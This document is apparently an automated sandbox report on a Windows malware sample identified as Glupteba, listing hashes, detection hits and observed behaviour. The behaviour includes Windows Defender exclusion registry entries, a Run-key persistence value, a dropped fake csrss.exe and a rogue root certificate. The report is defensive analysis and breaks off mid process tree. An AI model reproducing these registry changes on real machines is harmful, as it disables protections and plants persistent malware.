Analysis
-
max time kernel
171s -
max time network
194s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
29-01-2023 18:32
Static task
static1
Behavioral task
behavioral1
Sample
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
Resource
win10v2004-20221111-en
General
-
Target
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
-
Size
3.9MB
-
MD5
5625cb2982b7118b5e262fcfea2f4851
-
SHA1
f34e4c803b7b89d5342d50aa42b2cbd55845e373
-
SHA256
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e
-
SHA512
78f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0
-
SSDEEP
98304:EPOjA7HxZYd828AdJitFsozsNoQIU1ckttckumEeJWs:EWk7RZF4yil+QIU12s
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 9 IoCs
Processes:
resource yara_rule behavioral1/memory/1056-56-0x0000000001370000-0x0000000001B74000-memory.dmp family_glupteba behavioral1/memory/1056-57-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral1/memory/1056-59-0x0000000001370000-0x0000000001B74000-memory.dmp family_glupteba behavioral1/memory/1056-61-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral1/memory/968-64-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral1/memory/968-66-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral1/memory/968-72-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral1/memory/936-74-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral1/memory/936-75-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Processes:
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RoughDarkness = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe -
Executes dropped EXE 1 IoCs
Processes:
csrss.exepid process 936 csrss.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Loads dropped DLL 2 IoCs
Processes:
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exepid process 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe -
Processes:
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RoughDarkness = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\Run\RoughDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Windows directory 3 IoCs
Processes:
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exemakecab.exedescription ioc process File created C:\Windows\rss\csrss.exe a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe File created C:\Windows\Logs\CBS\CbsPersist_20230129193323.cab makecab.exe File opened for modification C:\Windows\rss a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1744 schtasks.exe 1000 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
netsh.exea7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.execsrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA csrss.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot csrss.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe -
Processes:
csrss.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exea7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exepid process 1056 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.execsrss.exedescription pid process Token: SeDebugPrivilege 1056 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Token: SeImpersonatePrivilege 1056 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe Token: SeSystemEnvironmentPrivilege 936 csrss.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.execmd.exedescription pid process target process PID 968 wrote to memory of 896 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe cmd.exe PID 968 wrote to memory of 896 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe cmd.exe PID 968 wrote to memory of 896 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe cmd.exe PID 968 wrote to memory of 896 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe cmd.exe PID 896 wrote to memory of 1964 896 cmd.exe netsh.exe PID 896 wrote to memory of 1964 896 cmd.exe netsh.exe PID 896 wrote to memory of 1964 896 cmd.exe netsh.exe PID 968 wrote to memory of 936 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe csrss.exe PID 968 wrote to memory of 936 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe csrss.exe PID 968 wrote to memory of 936 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe csrss.exe PID 968 wrote to memory of 936 968 a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe csrss.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe"C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe"C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe"2⤵
- Windows security bypass
